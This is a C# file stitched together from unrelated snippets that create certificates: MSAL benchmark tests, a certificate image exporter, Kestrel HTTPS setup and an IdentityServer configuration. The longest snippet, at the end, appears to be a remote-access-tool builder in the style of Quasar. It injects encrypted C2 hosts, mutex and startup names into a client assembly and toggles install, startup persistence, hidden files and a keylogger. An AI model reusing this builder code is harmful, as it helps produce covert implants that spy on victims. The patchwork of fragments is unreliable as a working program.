public BuilderTests()
{
_certificate = CertificateHelper.CreateCertificate("CN=rsa2048", RSA.Create(2048), HashAlgorithmName.SHA256, null);
_cca = ConfidentialClientApplicationBuilder
.Create(TestConstants.ClientId)
.WithAuthority(TestConstants.AuthorityTenant)
.WithRedirectUri(TestConstants.RedirectUri)
.WithCertificate(_certificate)
.Build();
}
public string Build(CertificateData data)
{
var userPath = GetUserPath();
var filePath = Path.Combine(
userPath,
$"Certificate-{data.Fullname.Replace(' ', '-')}-{DateTime.Now.ToString("yyyyMMddss")}.{FileFormat.Jpg}");
CertificateHelper.CreateCertificate(data, filePath);
return(filePath);
}
public static IHostBuilder CreateHostBuilder(string[] args) =>
Host.CreateDefaultBuilder(args)
.ConfigureWebHostDefaults(webBuilder =>
{
webBuilder.UseStartup <Startup>();
webBuilder.UseSerilog();
webBuilder.ConfigureKestrel(kestrel =>
{
kestrel.ConfigureHttpsDefaults(https =>
{
https.ServerCertificate = CertificateHelper.CreateCertificate(Configuration);
});
});
});
/// <summary>
/// Generate a certificate. Create a Confidential Client Application with that certificate and
/// an AcquireTokenForClient call to benchmark.
/// </summary>
public CryptoManagerTests()
{
_httpManager = new MockHttpManager();
_httpManager.MessageHandlerFunc = () => new MockHttpMessageHandler()
{
ExpectedMethod = HttpMethod.Post,
ResponseMessage = MockHelpers.CreateSuccessfulClientCredentialTokenResponseMessage()
};
_requests = new AcquireTokenForClientParameterBuilder[AppsCount];
for (int i = 0; i < AppsCount; i++)
{
X509Certificate2 certificate = CertificateHelper.CreateCertificate("CN=rsa2048", RSA.Create(2048), HashAlgorithmName.SHA256, null);
_cca = ConfidentialClientApplicationBuilder
.Create(TestConstants.ClientId)
.WithAuthority(new Uri(TestConstants.AuthorityTestTenant))
.WithRedirectUri(TestConstants.RedirectUri)
.WithCertificate(certificate)
.WithHttpManager(_httpManager)
.BuildConcrete();
AddHostToInstanceCache(_cca.ServiceBundle, TestConstants.ProductionPrefNetworkEnvironment);
_requests[_requestIdx] = _cca.AcquireTokenForClient(TestConstants.s_scope)
.WithForceRefresh(true);
}
}
public void ConfigureServices(IServiceCollection services)
{
services.AddControllersWithViews();
services.Configure <ForwardedHeadersOptions>(options =>
{
options.ForwardedHeaders =
ForwardedHeaders.XForwardedFor | ForwardedHeaders.XForwardedProto;
options.KnownNetworks.Clear();
options.KnownProxies.Clear();
});
// configures IIS out-of-proc settings (see https://github.com/aspnet/AspNetCore/issues/14882)
services.Configure <IISOptions>(iis =>
{
iis.AuthenticationDisplayName = "Windows";
iis.AutomaticAuthentication = false;
});
// configures IIS in-proc settings
services.Configure <IISServerOptions>(iis =>
{
iis.AuthenticationDisplayName = "Windows";
iis.AutomaticAuthentication = false;
});
services.AddDbContext <ApplicationDbContext>(options =>
options.UseSqlite(Configuration.GetConnectionString("DefaultConnection")));
services.AddIdentity <ApplicationUser, IdentityRole>()
.AddEntityFrameworkStores <ApplicationDbContext>()
.AddDefaultTokenProviders();
var builder = services.AddIdentityServer(options =>
{
options.Events.RaiseErrorEvents = true;
options.Events.RaiseInformationEvents = true;
options.Events.RaiseFailureEvents = true;
options.Events.RaiseSuccessEvents = true;
})
.AddInMemoryIdentityResources(IdentityServerConfig.Ids)
.AddInMemoryApiResources(IdentityServerConfig.Apis)
.AddInMemoryClients(
IdentityServerConfig.Clients(
Configuration.IdentityServerSpaClientRedirectUris(),
Configuration.IdentityServerSpaClientPostLogoutRedirectUris(),
Configuration.IdentityServerSpaClientAllowedCorsOrigins()
)
)
.AddProfileService <CustomProfileService>()
.AddAspNetIdentity <ApplicationUser>();
builder.AddSigningCredential(CertificateHelper.CreateCertificate(Configuration));
//builder.AddDeveloperSigningCredential();
services.AddAuthentication()
.AddGoogle(options =>
{
// register your IdentityServer with Google at https://console.developers.google.com
// enable the Google+ API
// set the redirect URI to http://localhost:5000/signin-google
options.ClientId = Configuration.GoogleClientId();
options.ClientSecret = Configuration.GoogleClientSecret();
})
.AddYandex(options =>
{
options.CallbackPath = "/signin-yandex";
options.ClientId = Configuration.YandexClientId();
options.ClientSecret = Configuration.YandexClientSecret();
});
services.AddTransient <IProfileService, CustomProfileService>();
}
private void WriteSettings(AssemblyDefinition asmDef)
{
var key = StringHelper.GetRandomString(32);
var aes = new Aes256(key);
var caCertificate = new X509Certificate2(Path.Combine(Application.StartupPath, "quasar.p12"), "", X509KeyStorageFlags.Exportable);
var clientCertificate = CertificateHelper.CreateCertificate("Quasar Client", caCertificate, 4096);
var serverCertificate = new X509Certificate2(caCertificate.Export(X509ContentType.Cert)); // export without private key, very important!
foreach (var typeDef in asmDef.Modules[0].Types)
{
if (typeDef.FullName == "Quasar.Client.Config.Settings")
{
foreach (var methodDef in typeDef.Methods)
{
if (methodDef.Name == ".cctor")
{
int strings = 1, bools = 1;
for (int i = 0; i < methodDef.Body.Instructions.Count; i++)
{
if (methodDef.Body.Instructions[i].OpCode == OpCodes.Ldstr) // string
{
switch (strings)
{
case 1: //version
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.Version);
break;
case 2: //ip/hostname
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.RawHosts);
break;
case 3: //installsub
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.InstallSub);
break;
case 4: //installname
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.InstallName);
break;
case 5: //mutex
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.Mutex);
break;
case 6: //startupkey
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.StartupName);
break;
case 7: //encryption key
methodDef.Body.Instructions[i].Operand = key;
break;
case 8: //tag
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.Tag);
break;
case 9: //LogDirectoryName
methodDef.Body.Instructions[i].Operand = aes.Encrypt(_options.LogDirectoryName);
break;
case 10: //ClientCertificate
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(clientCertificate.Export(X509ContentType.Pkcs12)));
break;
case 11: //ServerCertificate
methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(serverCertificate.Export(X509ContentType.Cert)));
break;
}
strings++;
}
else if (methodDef.Body.Instructions[i].OpCode == OpCodes.Ldc_I4_1 ||
methodDef.Body.Instructions[i].OpCode == OpCodes.Ldc_I4_0) // bool
{
switch (bools)
{
case 1: //install
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.Install));
break;
case 2: //startup
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.Startup));
break;
case 3: //hidefile
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.HideFile));
break;
case 4: //Keylogger
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.Keylogger));
break;
case 5: //HideLogDirectory
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.HideLogDirectory));
break;
case 6: // HideInstallSubdirectory
methodDef.Body.Instructions[i] = Instruction.Create(BoolOpCode(_options.HideInstallSubdirectory));
break;
}
bools++;
}
else if (methodDef.Body.Instructions[i].OpCode == OpCodes.Ldc_I4) // int
{
//reconnectdelay
methodDef.Body.Instructions[i].Operand = _options.Delay;
}
else if (methodDef.Body.Instructions[i].OpCode == OpCodes.Ldc_I4_S) // sbyte
{
methodDef.Body.Instructions[i].Operand = GetSpecialFolder(_options.InstallPath);
}
}
}
}
}
}
}
